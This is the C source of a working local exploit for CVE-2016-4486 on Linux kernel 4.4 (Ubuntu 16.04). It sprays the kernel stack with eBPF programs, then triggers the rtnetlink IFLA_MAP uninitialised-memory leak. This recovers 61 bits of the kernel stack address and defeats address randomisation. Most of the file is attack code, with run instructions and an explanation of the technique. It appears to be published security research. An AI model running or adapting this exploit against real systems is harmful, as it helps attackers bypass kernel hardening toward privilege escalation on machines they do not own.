/*
* [ Briefs ]
* - CVE-2016-4486 has discovered and reported by Kangjie Lu.
* - This is local exploit against the CVE-2016-4486.
*
* [ Tested version ]
* - Distro : Ubuntu 16.04
* - Kernel version : 4.4.0-21-generic
* - Arch : x86_64
*
* [ Prerequisites ]
* - None
*
* [ Goal ]
* - Leak kernel stack base address of current process by exploiting CVE-2016-4486.
*
* [ Exploitation ]
* - CVE-2016-4486 leaks 32-bits arbitrary kernel memory from uninitialized stack.
* - This exploit gets 61-bits stack base address among the 64-bits full address.
* remaining 3-bits is not leaked because of limitation of ebpf.
* - Full exploitation are performed as follows.
*
* 1. Spraying kernel stack as kernel stack address via running ebpf program.
* - We can spray stack up to 512-bytes by running ebpf program.
* - After this step, memory to be leaked will be filled with kernel stack address.
* 2. Trigger CVE-2016-4486 to leak 4-bytes which is low part of stack address.
* - After this step, stack address : 0xffff8800????????; (? is unknown address yet.)
* 3. Leak high 4-bytes of stack address. The leaking is done as one-by-one bit. why one-by-one?
* - CVE-2016-4486 allows to leak 4-bytes only, so that we always get low 4-bytes of stack address.
* - Then, How to overcome this challenge?? The one of possible answer is that
* do operation on high-4bytes with carefully selected value which changes low-4bytes.
* For example, Assume that real stack address is 0xffff880412340000;
* and, do sub operation. ==> 0xffff880412340000 - 0x0000000012360000 (selected value);
* The result will be "0xffff8803....." ==> Yap! low 4-bytes are changed!! and We can see this!
* The result makes us to know that high 4-bytes are smaller than 0x12360000;
* Then, We can keep going with smaller value.
* - The algorithm is quite similar to quick-search.
* 4. Unfortunately, ebpf program limitation stops us to leak full 64-bits.
* - 3-bits (bit[16], bit[15], bit[14]) are not leaked.
* - But, Since 3-bit is not sufficient randomness, It's very valuable for attacker.
* Bonus) Why do I use compat_sendmsg() instead of normal sendmsg()?
* - When I did spraying stack with normal sendmsg(), I couldn't spray up to memory to be leaked.
* - If I use compat-sendmsg(), The execution path will be different from normal sendmsg().
* This makes me to spray it more far.
*
* [ Run exploit ]
* - $ gcc poc.c -o poc
* - $ ./poc
* ....
* ....
* leak stack address range :
* -----from : ffff88007f7e0000
* --------to : ffff88007f7fc000
* (Since we can get 61-bit address, Print the possible address range out.)
*
* [ Contact ]
* - jinb.park7@gmail.com
* - github.com/jinb-park
*/
#include <asm/types.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <asm/unistd_64.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <linux/bpf.h>
#include <linux/filter.h>
#define GPLv2 "GPL v2"
#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0]))
#define INTERFACE_INDEX (0)
#define LEAK_OFFSET (28)
/*
* BPF-based stack sprayer
*/
/* registers */
/* caller-saved: r0..r5 */
#define BPF_REG_ARG1 BPF_REG_1
#define BPF_REG_ARG2 BPF_REG_2
#define BPF_REG_ARG3 BPF_REG_3
#define BPF_REG_ARG4 BPF_REG_4
#define BPF_REG_ARG5 BPF_REG_5
#define BPF_REG_CTX BPF_REG_6
#define BPF_REG_FP BPF_REG_10
#define BPF_MOV32_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
((struct bpf_insn) { \
.code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_STX_ADD_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_STX | BPF_XADD | BPF_SIZE(SIZE),\
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_MOV64_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_EXIT_INSN() \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_EXIT, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = 0 })
#define BPF_MOV64_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_ALU64_IMM(OP, DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_ALU64_REG(OP, DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
int bpf_(int cmd, union bpf_attr *attrs)
{
return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}
int prog_load(struct bpf_insn *insns, size_t insns_count)
{
char verifier_log[100000];
union bpf_attr create_prog_attrs = {
.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
.insn_cnt = insns_count,
.insns = (uint64_t)insns,
.license = (uint64_t)GPLv2,
.log_level = 1,
.log_size = sizeof(verifier_log),
.log_buf = (uint64_t)verifier_log
};
int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);
int errno_ = errno;
errno = errno_;
if (progfd == -1) {
printf("bpf prog load error\n");
exit(-1);
}
return progfd;
}
int create_socket_by_socketpair(int *progfd)
{
int socks[2];
if (socketpair(AF_UNIX, SOCK_SEQPACKET, 0, socks)) {
printf("socketpair error\n");
exit(-1);
}
if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, progfd, sizeof(int))) {
printf("setsockopt error\n");
exit(-1);
}
return socks[1];
}
int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count)
{
int progfd = prog_load(insns, insns_count);
return create_socket_by_socketpair(&progfd);
}
#define NR_sendmsg_32 370 // for 32-bit
typedef unsigned int compat_uptr_t;
typedef int compat_int_t;
typedef unsigned int compat_size_t;
typedef unsigned int compat_uint_t;
struct compat_msghdr {
compat_uptr_t msg_name; /* void * */
compat_int_t msg_namelen;
compat_uptr_t msg_iov; /* struct compat_iovec * */
compat_size_t msg_iovlen;
compat_uptr_t msg_control; /* void * */
compat_size_t msg_controllen;
compat_uint_t msg_flags;
};
struct compat_iovec {
compat_uptr_t iov_base;
compat_size_t iov_len;
};
int sendmsg_by_legacy_call(int fd, unsigned int msg, int flags)
{
int r = -1;
asm volatile (
"push %%rax\n"
"push %%rbx\n"
"push %%rcx\n"
"push %%rdx\n"
"push %%rsi\n"
"push %%rdi\n"
"mov %1, %%eax\n"
"mov %2, %%ebx\n"
"mov %3, %%ecx\n"
"mov %4, %%edx\n"
"int $0x80\n"
"mov %%eax, %0\n"
"pop %%rdi\n"
"pop %%rsi\n"
"pop %%rdx\n"
"pop %%rcx\n"
"pop %%rbx\n"
"pop %%rax\n"
: "=r" (r)
: "r"(NR_sendmsg_32), "r"(fd), "r"(msg), "r"(flags)
: "memory", "rax", "rbx", "rcx", "rdx", "rsi", "rdi"
);
return r;
}
#define COMPAT_SENDMSG
void trigger_proc(int sockfd)
{
#ifdef COMPAT_SENDMSG
struct compat_msghdr *msg = NULL;
struct compat_iovec *iov = NULL;
#else
struct msghdr *msg = NULL;
struct iovec *iov = NULL;
#endif
char *buf = NULL;
int r;
// allocate under-32-bit address for compat syscall
msg = mmap(0x70000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
if (msg == MAP_FAILED) {
printf("mmap error : %d, %s\n", errno, strerror(errno));
exit(0);
}
buf = mmap(0x90000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
if (buf == MAP_FAILED) {
printf("mmap error : %d, %s\n", errno, strerror(errno));
exit(0);
}
iov = mmap(0xb0000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
if (buf == MAP_FAILED) {
printf("mmap error : %d, %s\n", errno, strerror(errno));
exit(0);
}
#ifdef COMPAT_SENDMSG
iov->iov_base = (compat_uptr_t)buf;
#else
iov->iov_base = buf;
#endif
iov->iov_len = 128;
msg->msg_name = NULL;
msg->msg_namelen = 0;
#ifdef COMPAT_SENDMSG
msg->msg_iov = (compat_uptr_t)iov;
#else
msg->msg_iov = iov;
#endif
msg->msg_iovlen = 1;
msg->msg_control = NULL;
msg->msg_controllen = 0;
msg->msg_flags = 0;
#ifdef COMPAT_SENDMSG
r = sendmsg_by_legacy_call(sockfd, (unsigned int)msg, 0);
#else
r = sendmsg(sockfd, msg, 0);
#endif
if (r < 0) {
printf("sendmsg error, %d, %s\n", errno, strerror(errno));
exit(-1);
}
}
int sockfds = -1;
void stack_spraying_by_bpf(unsigned long val)
{
int r;
struct bpf_insn stack_spraying_insns[] = {
BPF_MOV64_REG(BPF_REG_3, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -val),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -368),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -376),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -384),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -392),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -400),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -408),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -416),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -424),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -432),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -440),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -448),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -456),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -464),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -472),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -480),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -488),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -496),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -504),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -512),
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN()
};
sockfds = create_filtered_socket_fd(stack_spraying_insns, ARRSIZE(stack_spraying_insns));
if (sockfds < 0)
return;
trigger_proc(sockfds);
close(sockfds);
//sleep(1);
}
/*
28byte, 32byte including padding
struct rtnl_link_ifmap {
__u64 mem_start;
__u64 mem_end;
__u64 base_addr;
__u16 irq;
__u8 dma;
__u8 port;
};*/
// rtnl_fill_link_ifmap <-- rtnl_fill_ifinfo (symbol)
struct {
struct nlmsghdr nh;
struct ifinfomsg ifm;
char attrbuf[512];
} req;
// Ubuntu 4.4.0-21-generic
#define RANGE_MIN_MASK ~((1<<16) | (1<<15) | (1<<14)) // and
#define RANGE_MAX_MASK ((1<<16) | (1<<15) | (1<<14)) // or
int main(int argc, char **argv)
{
unsigned char buf[65535];
unsigned char map_buf[36] = {0,};
struct nlmsghdr *nl_msg_ptr;
struct ifinfomsg *inf_msg_ptr;
struct rtnl_link_ifmap *map_ptr;
struct rtattr *rta_ptr;
int size, len, attr_len, offset;
int progfd;
unsigned int sub_val = 0;
unsigned int leak_value;
unsigned long leak_full_stack = 0;
unsigned int low_stack = 0;
int i;
for (i=0; i<16; i++) {
int rtnetlink_sk = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_ROUTE);
memset(&req, 0, sizeof(req));
req.nh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg));
req.nh.nlmsg_flags = NLM_F_DUMP | NLM_F_REQUEST;
req.nh.nlmsg_type = RTM_GETLINK;
req.nh.nlmsg_seq = 1;
req.ifm.ifi_family = AF_UNSPEC;
req.ifm.ifi_index = INTERFACE_INDEX;
req.ifm.ifi_change = 0xffffffff;
if (i == 0)
sub_val = 0;
else
sub_val += (1 << (32 - i));
stack_spraying_by_bpf((unsigned long)sub_val);
if (send(rtnetlink_sk, &req, req.nh.nlmsg_len, 0) < 0) {
printf("send error\n");
goto out;
}
while (1) {
if ((size = recv(rtnetlink_sk, buf, sizeof(buf), 0)) < 0) {
fprintf(stderr, "ERROR recv(): %s\n", strerror(errno));
goto out;
}
for (nl_msg_ptr = (struct nlmsghdr *)buf; size > (int)sizeof(*nl_msg_ptr);) {
len = nl_msg_ptr->nlmsg_len;
if (nl_msg_ptr->nlmsg_type == NLMSG_ERROR) {
printf("NLMSG_ERROR\n");
goto out;
}
else if (nl_msg_ptr->nlmsg_type == NLMSG_DONE)
break;
if (!NLMSG_OK(nl_msg_ptr, (unsigned int)size)) {
printf("Not OK\n");
goto out;
}
attr_len = IFLA_PAYLOAD(nl_msg_ptr);
inf_msg_ptr = (struct ifinfomsg *)NLMSG_DATA(nl_msg_ptr);
rta_ptr = (struct rtattr *)IFLA_RTA(inf_msg_ptr);
for (; RTA_OK(rta_ptr, attr_len); rta_ptr = RTA_NEXT(rta_ptr, attr_len)) {
if (rta_ptr->rta_type == IFLA_MAP) {
if (rta_ptr->rta_len != sizeof(map_buf)) {
printf("wrong size\n");
goto out;
}
memcpy(map_buf, RTA_DATA(rta_ptr), sizeof(map_buf));
map_ptr = &map_buf;
leak_value = *(unsigned int *)(map_buf + LEAK_OFFSET);
printf("leak_value : %08x\n", leak_value);
break;
}
}
size -= NLMSG_ALIGN(len);
nl_msg_ptr = (struct nlmsghdr *)((char *)nl_msg_ptr + NLMSG_ALIGN(len));
}
break;
}
if (low_stack == 0)
low_stack = leak_value;
else
if (leak_value != low_stack)
sub_val &= (~(1 << (32 - i))); // clear bit
memcpy((unsigned char *)&leak_full_stack + 4, &low_stack, 4);
memcpy((unsigned char *)&leak_full_stack, &sub_val, 4);
printf("[try-%d] stack address : %lx\n", i, leak_full_stack);
out:
close(rtnetlink_sk);
}
printf("=======================================================================\n");
printf("leak stack address range : \n");
printf("-----from : %lx\n", leak_full_stack & RANGE_MIN_MASK);
printf("--------to : %lx\n", leak_full_stack | RANGE_MAX_MASK);
printf("======================================================================\n");
return 0;
}